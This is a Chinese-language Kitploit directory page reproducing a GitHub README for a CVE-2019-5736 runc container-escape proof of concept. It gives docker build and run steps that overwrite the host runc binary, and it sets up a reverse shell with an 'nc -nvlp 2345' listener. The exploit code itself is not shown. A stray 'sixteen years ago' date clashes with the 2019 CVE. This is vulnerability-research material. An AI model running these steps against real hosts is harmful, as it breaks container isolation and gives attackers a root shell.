Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
POC-CVE-2019-5736 — 针对CVE-2019-5736的概念验证漏洞利用,演示了通过覆盖runc二进制文件并使用exec及恶意镜像payload实现容器逃逸。 | Kitploit
工具/GitHubGitHub/bbrathnayaka/poc-cve-2019-5736
容器安全Payload生成漏洞分析漏洞利用红队容器逃逸
GitHubbbrathnayaka/poc-cve-2019-5736

POC-CVE-2019-5736

针对CVE-2019-5736的概念验证漏洞利用,演示了通过覆盖runc二进制文件并使用exec及恶意镜像payload实现容器逃逸。

查看仓库
16年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

RunC-CVE-2019-5736

Build Status Build Status Build Status Build Status Build Status


视频: https://bit.ly/2WqvILb

博文: [www.idealhax.blogspot.com/2020/05/breaking-out-of-docker-via-runc.html]

这里我想提一下,这个漏洞利用的原始开发者是Twistlock实验室的Yuval Avrahami。

运行POC

请注意,运行POC会覆盖主机上的runC二进制文件。

强烈建议你在运行POC之前备份你的runC二进制文件(通常位于/usr/sbin/runc)。

克隆仓库:

root@kitploit:~
$ git clone [email protected]:BBRathnayaka/RunC-CVE-2019-5736.git

Exec POC

使用一个打印字符串的简单程序覆盖runc。

运行exec POC:

root@kitploit:~
$ docker build -t cve-2019-5736:exec_POC ./RunC-CVE-2019-5736/exec_POC
$ docker run -d --rm --name poc_ctr cve-2019-5736:exec_POC
$ docker exec poc_ctr bash

恶意镜像POC

使用一个连接到localhost:2345的简单反弹shell bash脚本覆盖runc。

监听反弹shell:

root@kitploit:~
$ nc -nvlp 2345

从另一个shell,运行恶意镜像POC:

root@kitploit:~
$ docker build -t cve-2019-5736:malicious_image_POC ./RunC-CVE-2019-5736/malicious_image_POC
$ docker run --rm cve-2019-5736:malicious_image_POC

参考

root@kitploit:~
See [Twistlock Labs](https://www.twistlock.com/labs-blog/breaking-docker-via-runc-explaining-cve-2019-5736/ "Explaining CVE-2019-5736") for an explanation of CVE-2019-5736 and the POCs.

The malicious image POC is heavily based on [q3k's POC](https://github.com/q3k/cve-2019-5736-poc), so all credit goes to him.
下载工具